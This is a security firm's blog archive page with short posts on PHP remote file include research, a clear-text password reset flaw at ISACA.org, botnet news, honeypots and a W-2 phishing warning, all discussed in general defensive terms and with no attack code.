Category Archives: General InfoSec

PHP RFI: Old Attack, Common #FAIL

Posted on by
1

I just completed the slides for my new presentation on application security. It is focused on understanding Remote File Include attacks against PHP implementations.

The preso covers what they are, how common they are, metrics, signatures, code examples and guidance for finding and mitigating them.

If there is interest, I will try and either record audio or video of the presentation and post that separately. If you would like to see/hear that in the near future, leave a comment below.

This research and the resulting project were made possible by two facets of MicroSolved, Inc. that we don’t talk a lot about, so here is some info on the power behind this project.

The first, is our application security assessments. We have really been focusing on these projects recently and my team has been working hard to complete assessments for clients, as well as a variety of open source/community tools. As a part of our deep lab capability here and our relationship with Syhunt, in Brazil, we have been working together to test and improve their Sandcat4PHP and Sandcat Pro products (which we distribute/resell for them in the US). Essentially, this gives us a very deep capability to “grey box” test PHP applications. For those unfamiliar with grey box testing, that means that the tools and engineers have both access to the source code (white box) and a useable testing version implementation (black box). Combined, this testing methodology creates a very robust, accurate and thorough capability to exercise and examine an application. Manual and automated assessments intertwine to achieve maximum width and depth of assessment.

The second facet that powered this project was the HoneyPoint Internet Threat Monitoring Environment (HITME). This is a rapidly-growing network* of HoneyPoint deployments donated to MSI for the purpose of gathering attack data. The HoneyPoint agents are deployed in a variety of international locations to give us a real-time, global view of attacker sources, frequency and tactics for our research projects. The HITME is a unique capability to MSI and brings us data that most other security organizations can only dream of. In turn, we take the gathered knowledge and give it back to the security community in presentations and projects like this and the @honeypoint/#HITME feeds on Twitter and use it to protect our clients against an ever-growing arsenal of threats.

Combined, these capabilities have helped us identify hundreds of new PHP RFI attack signatures (which we plan to release shortly), find privately released PERL and PHP attack code/bot-net infectors (shared with the AV & IDS/IPS vendors) and build this presentation for the security community.

It also opened our eyes to just how popular PHP has become and how large the footprint is in corporate organizations and businesses around the world. In a recent survey, about 50% of the polled population stated that they did not have PHP in their enterprise, but did indicate that they use some combination of WordPress, Drupal, Joomla, Moodle, etc. All of these technologies are written in and utilize PHP! To the MSI team, this represents another area where the underlying technology is not understood in our corporate networks. This is another “unknown” for the attacker to leverage.

I hope you enjoy the presentation slides and I look forward to presenting this in public. If you would like to discuss more about our application security capabilities or the HITME, please let me know.

* Organizations and individuals can donate the operation of an Internet facing HoneyPoint Agent to MSI. Depending on the situation, they may receive a free license for HoneyPoint or the HoneyPoint Managed Service for their organization or home network. If you think you might be interested, please let me know and we can discuss how we might be able to work together.

Why I No Longer Have a Login at ISACA.org

Posted on by
Reply

After much conversation with the folks who manage the ISACA.org site and quite a bit of frustration trying to reach the people responsible for the site within ISACA, I had a good discussion with them last night and they have removed my login credentials by my request. While I have been and continue to be a supporter and member of ISACA, I disagree with them over this particular issue.

The problem is that the ISACA.org password reset mechanism sends your password in clear text to your registered email address. An attacker, or anyone, only needs to know or guess a user name to cause the system to send the password. If an attacker initiates this process and can gain access to the email system or the email itself in transit, then they gain access to a live, user generated password.

The threat model for this is obvious and commonly exploited. Users, even security folks, often re-use the same passwords around the Internet for a variety of sites. If the attacker can gain the password by exploiting this mechanism, then it becomes easy to try and leverage those credentials on a myriad of sites and accounts. Similar attacks have been quite popular lately and have proven effective for high level compromises on social media, e-commerce and other popular sites.

When I explained the problem to the web manager, he did not disagree with either the risk or the attack vectors. He only explained that they had known of the problem for a year or so and that their mitigation was to launch a new web site. He assured me the new site would be ready within a few months. He explained that the new site, in accordance with current best-practices, would include a new reset mechanism for passwords that used a token URL link or the like instead of a plain text password. I suggested that they remove the current mechanism from use until then and he said they would explore that as an option.

My main point on this issue is that I expect more from ISACA. I expect that since they are teaching the world to audit systems and processes for security, that they themselves would have secure processes. I especially have a hard time accepting that they knew of this problem for a year and chose to accept the risk without any additional controls being implemented, thereby placing the residual risk squarely on the shoulders of their members. To make matters worse, they transferred this risk to the membership without so much as a reminder or disclosure statement on their site about the problem. I understand that they may have resource constraints around managing the site, as he explained,   but these are the same issues that all organizations face, including the very organizations their training teaches people not to accept this explanation from.

While the discussion was amiable and professional, I am left with my disappointment. I got no assurances that anything would be done differently until the new site is launched and I got no sense for how that new site will be peer tested, reviewed or the like. Thus, I asked them to remove my account until that time. This is also the reason I am making this post. I want all ISACA members to be aware of the risk and that their credentials could potentially be exposed. Hopefully, none of the membership reuses their password around the web, but that seems unlikely. At least now, if they read this blog post, they will be aware.

Please feel free to let me know your thoughts on this issue by leaving a comment below. You can also contact ISACA by phone. Their numbers are listed in the contact us portion of their website.

Lastly, I want to say that I continue to support ISACA and their membership. I think their mission is critical and that their training is a strong positive for the security community and the world at large. As always, thanks for reading!

Interesting Bot News

Posted on by
Reply

In the last couple of days, there have been a couple of interesting pieces of bot-net news.

This one, discusses how a bot-net software war is brewing over control of your PC. Some bots are now including kill code for other bots. In this case, the new kid on the block is killing zeus code to make sure it has sole control over your fraud.
Then there was this one about ms10-015 where the bot authors have fixed their rootkit code to make the BSOD go away. They did this not as a favor to MS or anything, but to restore use of the PCs and their chain of fraud. They also wanted to cover up their own code to keep users from cleaning it.
Interesting stuff around the bot threat landscape….

Broken Window Economics and Being “Type B”

Posted on by
Reply

I am actually quite glad that this article was written. I agree with its premise and I am very glad that MicroSolved is a “type B” security vendor. I am OK with that. It fits my world view. I am OK with not being a member of the “PCI in crowd” or doing infosec “just like all of the other vendors.” In fact, I STRIVE for MSI to do it differently. I PUSH my organization to serve our clients at a higher level. I STRAIN to help them achieve leverage. I think being “type B” makes MicroSolved INVALUABLE as a security partner.

That, in my book, is worth far more than being popular, one of the crowd or getting industry trophies and certificates. Those things might be nice for some, but helping OUR CLIENTS serve their customers in a safer way is just more our focus at MSI.

New Emerging Web Scans from the HITME

Posted on by
Reply

We started picking up a few very low intensity scans last night. The pace of them are increasing. They appear to be aimed at cataloging users of the ANT tool. You can find a list of the scanning targets and a link to BrainWebScan here, if you would like to check for them yourself.

If you are a MicroSolved Managed Assessment (GuardDog) client, your systems will be tested during your next scheduled assessment.

If you have any questions or would like to know more about our ongoing assessment services, threat management or application security testing, feel free to email us at info [at] microsolved [dot] C O M or give us a shout at 1-877-351-1237. We would love to discuss it with you!

We Have An iPhone App for Our Blog!

Posted on by
Reply

Our press release:

MSI RELEASES IPHONE APP FOR “STATE OF SECURITY” BLOG
MSI Offers Free Tool to Allow Access to Blog’s RSS Through iPhone App

COLUMBUS, Ohio January 26, 2010 — MicroSolved, Inc. (MSI) is pleased to introduce a fun free tool to add to a user’s iPhone app menu. Now readers of the “State of Security” blog can easily keep track of updates through a simple application that is available through Apple’s iTunes Store. The tool is designed to make it easier for security people to track emerging threats and stay up to date with security news.

MicroSolved’s “State of the Security” blog not only covers an array of security topics, but also is the launching pad for collaborative projects and quick online chats regarding “hot” threats of the day. The blog is very popular among security teams, CISOs and others with an interest in information security.

Those who would like to add the free application to their iPhone can download it here

FLASH Campfire Chat January 22 at 10 AM: The Aurora Vulnerability

Posted on by
Reply

Much media attention has been focused on the recent Internet Explorer vulnerabilities and the attacks and compromises of several large companies. Rumors are flying fast and furious around the Internet. Come learn about the technical exposures of these vulnerabilities, the suggest options for protection of your organization, and a discussion about what your peers are doing to manage this and other client-side attacks. Cut through the hype, ignore the hyperbole and let’s get down to the brass tacks. Attendees of this session will get an overview of the Aurora vulnerability, insights into client-side attack tactics and come away with suggestions for risk minimization.

Here are the details:

Date: Friday, January 22
Time: 10:00 AM EST
Location: Our Campfire Chat Room

Looking forward to seeing you there!

How Honeypots Can Help You

Posted on by
Reply

A honeypot is a trap set to detect or deflect attempts at unauthorized use of information systems. Generally it consists of a computer, data or a network site that appears to be part of a network but which is actually isolated and protected, and which seems to contain information that would be of value to attackers.

It is important to note that honeypots are not a solution in themselves. They are a tool. How much they can help you depends upon what you are trying to achieve.

There are two different types of honeypots: production and research. Production honeypots are typically used by companies and corporations. They’re easy to use and capture only limited information.

Research honeypots are more complex. They capture extensive information, and used primarily by research, military, or government organizations.

The purpose of a production honeypot is to mitigate risk to an organization. It’s part of the larger security strategy to detect threats. The purpose of a research honeypot is to collect data on the blackhat community. They are used to gather the general threats against an organization, enabling the organization to strategize their response and protect their data.

The value of honeypots lies in its simplicity. It’s technology that is intended to be compromised. There is little or no production traffic going to or from the device. This means that any time a connection is sent to the honeypot, it is most likely to be a probe, scan, or even attack. Any time a connection is initiated from the honeypot, this most likely means the honeypot was compromised. As we say about our HoneyPoint Security Server, any traffic going to or from the honeypot is, by definition, suspicious at best, malicious at worst. Now, this is not always the case. Mistakes do happen, such as an incorrect DNS entry or someone from accounting inputting the wrong IP address. But in general, most honeypot traffic represents unauthorized activity. What are the advantages to using honeypots?

  1. Honeypots collect very little data. What they do collect is normally of high value. This eliminates the noise, making  it much easier to collect and archive data. One of the greatest problems in security is sifting through gigabytes of useless data to find something meaningful. Honeypots can give users the exact information they need in a quick and easy to understand format.
  2. Many security tools can drown in bandwidth usage  or activity. NIDs (Network Intrusion Detection devices)  may not be able to handle network activity, and important data can fall through the cracks. Centralized log servers may not be able to collect all the system logs, potentially dropping logs. The beauty of honeypots is that they only capture that which comes to them.

Many of our clients swear by our HoneyPoint family of products to help save resources. With its advantages, it’s easy to see why! Leveraging the power of honeypots is an excellent way to safeguard your data.

Beware: Fraudulent W-2 Emails Ahead

Posted on by
Reply

Tax season is upon us and spammers are taking full advantage of the situation. Reports of fraudulent emails that appear to come from the IRS are popping up. The email states that all employers need to complete the attached W-2 update form. Unfortunately, the attachment contains a remote administration tool that allows the attacker to execute commands on the system.

The malicious file is named W2-Form and has various file extensions including .rtf, .pdf, and ,.doc.

While this attack targets employers, I suspect that the next wave will target employees. Possible scenarios include malicious attachments as described above and directing employees to fake corporate websites.
Employers should notify their employees of how W-2 information will be delivered and warm them of possible fraudulent emails. For more information on reporting these types of malicious emails visit

http://www.irs.gov/privacy/article/0,,id=179820,00.html